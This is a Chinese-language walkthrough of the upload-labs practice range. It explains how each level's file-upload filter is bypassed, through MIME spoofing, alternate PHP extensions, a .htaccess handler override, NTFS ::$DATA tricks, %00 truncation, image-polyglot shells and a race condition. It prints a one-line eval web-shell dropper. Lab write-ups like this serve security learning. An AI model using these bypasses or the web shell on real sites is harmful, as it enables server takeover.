upload通关手册

upload-labs通关

0x00 前言

这段时间一直在忙，没时间来更新文章，这里就写篇upload-labs的通关手册吧，现在包括网上也有很多upload通关手册，但是在这里还是想自己去写一篇，来做个自我总结。在做靶场当中也参考了网上的文章。

0x01 pass-01-10

第一关

来到第一关卡，选择，把burp开启抓包。点击上传会发现，直接就弹框不允许上传了。

那么基本可以判断这是个前端校验的。此时有三种办法，

（1）、审查元素删除过滤函数

（2）、直接禁用js

（3）、先上传jpg文件然后抓包重命名

这里就直接来禁用js文件绕过。

上传成功。

第二关

查看源代码

$_FILES["file"]["name"] - 上传文件的名称
$_FILES["file"]["type"] - 上传文件的类型
$_FILES["file"]["size"] - 上传文件的大小，以字节计
$_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称
$_FILES["file"]["error"] - 由文件上传导致的错误代码

这里获取了上传文件的类型，如果类型等于image/jpeg、image/png、image/gif就可以上传成功。

可以直接修改mime类型来绕过。

burp抓包，修改content-type的类型为image/gif

成功绕过。

第三关

file_exists() 函数检查文件或目录是否存在。

trim() ：函数移除字符串两侧的空白字符或其他预定义字符。

deldot()：移除末尾的点

strrchr() 函数查找字符在指定字符串中从后面开始的第一次出现的位置，如果成功，则返回从该位置到字符串结尾的所有字符，如果失败，则返回 false。与之相对应的是strstr()函数，它查找字符串中首次出现指定字符的位置

strtolower：转化为小写

这里定义了一个数组，黑名单的数组，并且去除了末尾的点和空格、::$data等字符，且匹配了后缀名。

这里还可以使用到一些过滤不全去绕过，上传php3或者是phtml一样能被当做php来识别，当然这个得看apache的解析设置。

抓包改名为php3，点击forword

上传成功，成功被识别。

第四关

由于后面的关卡和前面的代码大致一样就不一一解释了。

第四关卡把能禁用的都给禁用掉了，但是唯独没有禁用掉.htaccess 文件我们可以上传.htaccess文件，然后再去上传图片马。

.htacess 内容如下：

SetHandler application/x-httpd-php

成功绕过上传限制。

第五关

这里比上一关少了一个转换成小写，我们就可以利用到大小写去对他进行绕过。

windwos对大小写不敏感，无论大小写都能识别，而linux则相反。

上传成功，下一关

第六关

这一关和前面的都差不多，去除了点号和::$data 但是缺少去除空格的函数。

我们可以加个空格来绕过他的限制，在windows里面后缀的空格会自动过滤掉。

这里后缀后面加了个空格，成功绕过

第七关

这里没有去除后缀后面的点，我们可以利用到windows 后缀加点号自动过滤掉的这个特性来绕过限制。

成功绕过。

第八关

代码里面去除了点号空格，但是这关确漏掉了::$data,我们就可以利用到windwos文件流特性去绕过文件上传限制。利用的是NTFS文件系统的一个特性，NTFS存储数据流的一个属性，当我们这样去访问的时候，其实我们请求的，它就会被认为是phpinfo.php本身的数据

上传完成后，去除::$data 直接访问xx.php文件解析成功

第九关

第九关这个地方去除去除了大部分的东西，前面用到的点号和空格都被过滤了，但是这里还是有办法绕过去，我们可以多加几个空格和点 ，代码里面的只过滤一次。

添加完成后发包过去就可以看到上传成功。

访问，解析成功。

第十关

在第十关代码和前面的不大一样，我们来审计一下代码

这里定义了一个array数组，黑名单的数组，如果匹配到接收过来的后缀等于定义数组里面的内容就替换为空。

代码如下：

 $file_name = str_ireplace($deny_ext,"", $file_name);

str_ireplace 是个替换的函数

我们尝试直接上传个phpinfo 。

这里能直接上传成功，但是后缀被替换为空了，因为这些代码都是只过滤一次，我们可以使用到双写来绕过。

第十一关

这里的代码写的是白名单，只允许上传jpg等图片格式的文件，在我们前面用到的黑名单都不能使用了。

但是我们还可以利用到00截断来对他进行绕过。

在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束。

使用burp抓包后，发现他的目录是可控的，我们可以直接从目录那里对他进行截断

发送 访问

这里会访问失败，把php后面的东西去掉，再次访问。

第十二关

第十二关也是一样的白名单，先来抓个包看看

这里发现和前面不一样的地方，就是刚刚的路径是在url里面的，而这一个关卡的是在post包里面。

那么需要00截断需要解码，因为在url里面传参会自动解码而post里面不会。

发送

第十三关

这里的代码定义个函数打开我们上传的文件并且读取我们的前面2位数。

这时候我们改文件后缀是没用的，一样上传不了，可以直接加上gif89a或者是直接制作图片马。

copy 1.jpg/b+phpinfo.php/a 3.jpg

制作完成，直接上传，然后还需要配合文件包含来解析。

图片马上传成功，打开解析漏洞的页面包含这张图片。

成功执行。第十四关也是一样的可以上传成功，都是判断了图片的完整性

第十五关

这里使用的

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

定义有以下常量，并代表了 exif_imagetype() 可能的返回值：

1	IMAGETYPE_GIF
2	IMAGETYPE_JPEG
3	IMAGETYPE_PNG 

上传图片马，配合文件包含漏洞，成功解析

这几关里面，唯一不同的就是验证图片的方式和函数不一样。

第十六关

这里的验证比前面的多了不是，获取了名字和mime类型，

然后进行校验，验证完成后才进行二次渲染

第十六关，使用了gd库对图片做了二次渲染。

那么我们先来上传一个普通的图片马看看。

上传完成后使用包含，报错了。

我们来下载这张图片然后对他进行查看。

用010editot打开发现我们后面加上的phpinfo();已经被刷掉了。

那么我们可以使用16进制对比工具来看 原图和渲染后的图，哪个地方没用被gd给处理过，从gd库没处理的地方插入paylaod。

显示蓝色的是未被gd库未被渲染的地方

关于二次渲染可以参考先知论坛大佬的文章，很详细。

https://xz.aliyun.com/t/2657

第十七关

move_uploaded_file() 函数将上传的文件移动到新位置。
若成功，则返回 true，否则返回 false。
rename() 函数重命名文件或目录。

这里先是把文件用move_uploaded_file()函数移动到了上传的目录下面，如果不是白名单，再使用unlink函数将文件删除。

那么我们可以上传写入木马的代码

<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]) ?>'); ?>

截取上传数据包，发送到intrude模块，持续发送，另外开一个持续访问上传的目录。

等到响应200 的时候木马就写入成功了。

然后浏览器访问shell.php

访问成功，这时候就可以拿一句话去连接了

这里的条件竞争条件是文件未被重命名。

0x02 结尾

这里就把大致的方法都总结了一遍，当然还确实了一些各种的解析漏洞和文件包含的东西，都会配合到文件上传漏洞来使用，在一些cms爆出后台getshell漏洞时候也可以getshell ，比如配置插马，备份数据库拿shelll 。